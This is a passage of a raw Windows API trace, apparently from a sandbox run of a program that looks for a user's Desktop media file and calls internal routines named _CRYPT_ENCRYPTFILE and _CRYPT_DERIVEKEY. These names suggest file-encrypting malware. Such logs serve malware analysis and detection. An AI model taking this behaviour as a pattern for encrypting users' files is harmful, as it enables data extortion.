dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.895] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.895] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.895] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.896] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.896] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0xf7a7c0f0, ftLastWriteTime.dwHighDateTime=0x1d5de94, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 0x90af58 [0161.896] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0161.896] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.897] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.897] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0161.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.897] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.897] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.898] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.898] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.899] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.899] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.899] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.900] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.900] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.900] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.900] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0161.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.900] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.900] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.901] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.901] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.901] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.901] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.901] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.901] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.901] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.901] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.901] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.901] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 